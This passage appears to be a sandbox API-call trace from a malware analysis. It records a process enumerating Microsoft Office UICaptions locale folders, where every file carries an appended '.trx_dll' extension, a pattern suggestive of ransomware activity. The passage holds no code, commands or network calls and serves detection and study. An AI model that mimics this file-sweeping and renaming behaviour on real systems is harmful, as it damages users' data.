lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x57655500, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x57655500, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x87f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUB6INTL.REST.trx_dll", cAlternateFileName="PUB6IN~2.TRX")) returned 1 [0253.213] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2720b500, ftCreationTime.dwHighDateTime=0x1cac80f, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2720b500, ftLastWriteTime.dwHighDateTime=0x1cac80f, nFileSizeHigh=0x0, nFileSizeLow=0x57f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUBWZINT.REST.trx_dll", cAlternateFileName="PUBWZI~1.TRX")) returned 1 [0253.213] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x94d0df00, ftCreationTime.dwHighDateTime=0x1cac817, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x94d0df00, ftLastWriteTime.dwHighDateTime=0x1cac817, nFileSizeHigh=0x0, nFileSizeLow=0x3360, dwReserved0=0x0, dwReserved1=0x0, cFileName="SGRES.DLL.trx_dll", cAlternateFileName="SGRESD~1.TRX")) returned 1 [0253.213] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xca190500, ftCreationTime.dwHighDateTime=0x1cac7f6, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xca190500, ftLastWriteTime.dwHighDateTime=0x1cac7f6, nFileSizeHigh=0x0, nFileSizeLow=0x4360, dwReserved0=0x0, dwReserved1=0x0, cFileName="STINTL.DLL.trx_dll", cAlternateFileName="STINTL~1.TRX")) returned 1 [0253.213] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf706700, ftCreationTime.dwHighDateTime=0x1cac81a, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbf706700, ftLastWriteTime.dwHighDateTime=0x1cac81a, nFileSizeHigh=0x0, nFileSizeLow=0x6960, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISBRRES.DLL.trx_dll", cAlternateFileName="VISBRR~1.TRX")) returned 1 [0253.213] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70273800, ftCreationTime.dwHighDateTime=0x1cac814, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x70273800, ftLastWriteTime.dwHighDateTime=0x1cac814, nFileSizeHigh=0x0, nFileSizeLow=0x73960, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISINTL.DLL.trx_dll", cAlternateFileName="VISINT~1.TRX")) returned 1 [0253.213] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa1789a00, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0ca650, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa1789a00, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x24360, dwReserved0=0x0, dwReserved1=0x0, cFileName="WWINTL.DLL.trx_dll", cAlternateFileName="WWINTL~1.TRX")) returned 1 [0253.214] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa2a9c700, ftCreationTime.dwHighDateTime=0x1cacd25, ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa2a9c700, ftLastWriteTime.dwHighDateTime=0x1cacd25, nFileSizeHigh=0x0, nFileSizeLow=0x110b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="WWINTL.REST.trx_dll", cAlternateFileName="WWINTL~2.TRX")) returned 1 [0253.214] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x61df1900, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef0f07b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x61df1900, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x23960, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLINTL32.DLL.trx_dll", cAlternateFileName="XLINTL~1.TRX")) returned 1 [0253.214] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x61df1900, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x61df1900, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x126760, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLINTL32.REST.trx_dll", cAlternateFileName="XLINTL~2.TRX")) returned 1 [0253.214] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7e38000, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xd7e38000, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x3960, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSLICER.DLL.trx_dll", cAlternateFileName="XLSLIC~1.TRX")) returned 1 [0253.214] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0253.214] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0253.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.215] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", lpFilePart=0x0) returned 0x48 [0253.215] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", lpFilePart=0x0) returned 0x48 [0253.215] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", lpFilePart=0x0) returned 0x48 [0253.215] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", lpFilePart=0x0) returned 0x48 [0253.215] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", lpFilePart=0x0) returned 0x48 [0253.215] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", lpFilePart=0x0) returned 0x48 [0253.215] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", lpFilePart=0x0) returned 0x48 [0253.215] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", lpFilePart=0x0) returned 0x48 [0253.215] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", lpFilePart=0x0) returned 0x48 [0253.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.218] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036", lpFilePart=0x0) returned 0x33 [0253.218] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpFilePart=0x0) returned 0x34 [0253.220] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef116910, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0253.222] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1be9a700, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1be9a700, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x3960, dwReserved0=0x0, dwReserved1=0x0, cFileName="ENVELOPR.DLL.trx_dll", cAlternateFileName="ENVELO~1.TRX")) returned 1 [0253.222] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd48e100, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbd48e100, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0xbf60, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRINTL32.DLL.trx_dll", cAlternateFileName="GRINTL~1.TRX")) returned 1 [0253.222] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd48e100, ftCreationTime.dwHighDateTime=0x1cac7f7, ftLastAccessTime.dwLowDateTime=0xeedf6c30, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbd48e100, ftLastWriteTime.dwHighDateTime=0x1cac7f7, nFileSizeHigh=0x0, nFileSizeLow=0x3d960, dwReserved0=0x0, dwReserved1=0x0, cFileName="GRINTL32.REST.trx_dll", cAlternateFileName="GRINTL~2.TRX")) returned 1 [0253.222] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1be9a700, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1be9a700, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x49f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MAPIR.DLL.trx_dll", cAlternateFileName="MAPIRD~1.TRX")) returned 1 [0253.223] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa27f6800, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa27f6800, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0xc160, dwReserved0=0x0, dwReserved1=0x0, cFileName="MOR6INT.REST.trx_dll", cAlternateFileName="MOR6IN~1.TRX")) returned 1 [0253.223] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9f53ca00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x9f53ca00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x17960, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOINTL.DLL.trx_dll", cAlternateFileName="MSOINT~1.TRX")) returned 1 [0253.223] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9f53ca00, ftCreationTime.dwHighDateTime=0x1caca0b, ftLastAccessTime.dwLowDateTime=0xeeeb5310, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x9f53ca00, ftLastWriteTime.dwHighDateTime=0x1caca0b, nFileSizeHigh=0x0, nFileSizeLow=0x2ced60, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSOINTL.REST.trx_dll", cAlternateFileName="MSOINT~2.TRX")) returned 1 [0253.223] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa381000, ftCreationTime.dwHighDateTime=0x1cac7fb, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xaa381000, ftLastWriteTime.dwHighDateTime=0x1cac7fb, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x0, dwReserved1=0x0, cFileName="OMSINTL.DLL.trx_dll", cAlternateFileName="OMSINT~1.TRX")) returned 1 [0253.223] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7337cc00, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7337cc00, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x7b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONINTL.DLL.trx_dll", cAlternateFileName="ONINTL~1.TRX")) returned 1 [0253.223] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7337cc00, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7337cc00, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x3fb60, dwReserved0=0x0, dwReserved1=0x0, cFileName="ONINTL.REST.trx_dll", cAlternateFileName="ONINTL~2.TRX")) returned 1 [0253.223] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ab87a00, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1ab87a00, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x37560, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLLIBR.DLL.trx_dll", cAlternateFileName="OUTLLI~1.TRX")) returned 1 [0253.224] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ab87a00, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1ab87a00, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0xa6560, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLLIBR.REST.trx_dll", cAlternateFileName="OUTLLI~2.TRX")) returned 1 [0253.224] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1be9a700, ftCreationTime.dwHighDateTime=0x1caca12, ftLastAccessTime.dwLowDateTime=0xeef739f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1be9a700, ftLastWriteTime.dwHighDateTime=0x1caca12, nFileSizeHigh=0x0, nFileSizeLow=0x2b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="OUTLWVW.DLL.trx_dll", cAlternateFileName="OUTLWV~1.TRX")) returned 1 [0253.224] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cef6000, ftCreationTime.dwHighDateTime=0x1cac803, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7cef6000, ftLastWriteTime.dwHighDateTime=0x1cac803, nFileSizeHigh=0x0, nFileSizeLow=0xcd60, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPINTL.DLL.trx_dll", cAlternateFileName="PPINTL~1.TRX")) returned 1 [0253.224] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cef6000, ftCreationTime.dwHighDateTime=0x1cac803, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7cef6000, ftLastWriteTime.dwHighDateTime=0x1cac803, nFileSizeHigh=0x0, nFileSizeLow=0x45f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPINTL.REST.trx_dll", cAlternateFileName="PPINTL~2.TRX")) returned 1 [0253.224] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3b09500, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa3b09500, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x1a360, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUB6INTL.DLL.trx_dll", cAlternateFileName="PUB6IN~1.TRX")) returned 1 [0253.224] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa27f6800, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa27f6800, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x8e160, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUB6INTL.REST.trx_dll", cAlternateFileName="PUB6IN~2.TRX")) returned 1 [0253.225] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x749d2200, ftCreationTime.dwHighDateTime=0x1cac80f, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x749d2200, ftLastWriteTime.dwHighDateTime=0x1cac80f, nFileSizeHigh=0x0, nFileSizeLow=0x5ab60, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUBWZINT.REST.trx_dll", cAlternateFileName="PUBWZI~1.TRX")) returned 1 [0253.225] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d7a1200, ftCreationTime.dwHighDateTime=0x1cac817, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6d7a1200, ftLastWriteTime.dwHighDateTime=0x1cac817, nFileSizeHigh=0x0, nFileSizeLow=0x3360, dwReserved0=0x0, dwReserved1=0x0, cFileName="SGRES.DLL.trx_dll", cAlternateFileName="SGRESD~1.TRX")) returned 1 [0253.225] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8e7d800, ftCreationTime.dwHighDateTime=0x1cac7f6, ftLastAccessTime.dwLowDateTime=0xef058230, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xc8e7d800, ftLastWriteTime.dwHighDateTime=0x1cac7f6, nFileSizeHigh=0x0, nFileSizeLow=0x4160, dwReserved0=0x0, dwReserved1=0x0, cFileName="STINTL.DLL.trx_dll", cAlternateFileName="STINTL~1.TRX")) returned 1 [0253.225] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf706700, ftCreationTime.dwHighDateTime=0x1cac81a, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xbf706700, ftLastWriteTime.dwHighDateTime=0x1cac81a, nFileSizeHigh=0x0, nFileSizeLow=0x6960, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISBRRES.DLL.trx_dll", cAlternateFileName="VISBRR~1.TRX")) returned 1 [0253.225] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a315700, ftCreationTime.dwHighDateTime=0x1cac814, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x6a315700, ftLastWriteTime.dwHighDateTime=0x1cac814, nFileSizeHigh=0x0, nFileSizeLow=0x77560, dwReserved0=0x0, dwReserved1=0x0, cFileName="VISINTL.DLL.trx_dll", cAlternateFileName="VISINT~1.TRX")) returned 1 [0253.226] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0253.227] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.227] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.227] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.229] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.229] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.231] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.231] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.231] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.232] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0253.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0253.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0253.232] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.232] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0253.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0253.232] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0253.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0253.232] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0253.233] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0253.233] 